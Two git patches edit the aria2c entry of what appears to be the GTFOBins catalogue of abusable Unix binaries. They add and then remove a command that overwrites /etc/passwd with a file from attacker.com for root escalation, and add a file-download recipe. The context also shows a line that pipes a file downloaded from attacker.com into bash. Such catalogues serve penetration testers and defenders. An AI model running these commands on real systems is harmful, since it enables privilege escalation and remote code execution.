From 42cac0885e058e184492988899b61f9fc03657af Mon Sep 17 00:00:00 2001
From: ohyicong <ohyicong@hotmail.com>
Date: Mon, 2 Jan 2023 16:36:59 +0800
Subject: [PATCH 1/2] Add SUID method to aria2c

Found this new method of abusing aria2c's suid for privilege escalation.
---
 _gtfobins/aria2c.md | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md
index 5793b81..b617801 100644
--- a/_gtfobins/aria2c.md
+++ b/_gtfobins/aria2c.md
@@ -17,6 +17,10 @@ functions:
         echo "$COMMAND" > $TF
         chmod +x $TF
         sudo aria2c --on-download-error=$TF http://x
+  suid:
+    - code: |
+        aria2c -d /etc/ -o passwd "http://attacker.com/passwd" --allow-overwrite=true
+    - description: Remote download and replace /etc/passwd with root privilege.
   limited-suid:
     - code: |
         COMMAND='id'

From 0417be546ef2e85c77784612ba09c812723cfcd7 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Sat, 7 Jan 2023 20:14:40 +0100
Subject: [PATCH 2/2] Simplify aria2c file download

---
 _gtfobins/aria2c.md | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/_gtfobins/aria2c.md b/_gtfobins/aria2c.md
index b617801..73da9e9 100644
--- a/_gtfobins/aria2c.md
+++ b/_gtfobins/aria2c.md
@@ -10,6 +10,12 @@ functions:
         aria2c --on-download-error=$TF http://x
     - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
       code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
+  file-download:
+    - description: Fetch a remote file via HTTP GET request. Use `--allow-overwrite` if needed.
+      code: |
+        URL=http://attacker.com/file_to_get
+        LFILE=file_to_save
+        aria2c -o "$LFILE" "$URL"
   sudo:
     - code: |
         COMMAND='id'
@@ -17,10 +23,6 @@ functions:
         echo "$COMMAND" > $TF
         chmod +x $TF
         sudo aria2c --on-download-error=$TF http://x
-  suid:
-    - code: |
-        aria2c -d /etc/ -o passwd "http://attacker.com/passwd" --allow-overwrite=true
-    - description: Remote download and replace /etc/passwd with root privilege.
   limited-suid:
     - code: |
         COMMAND='id'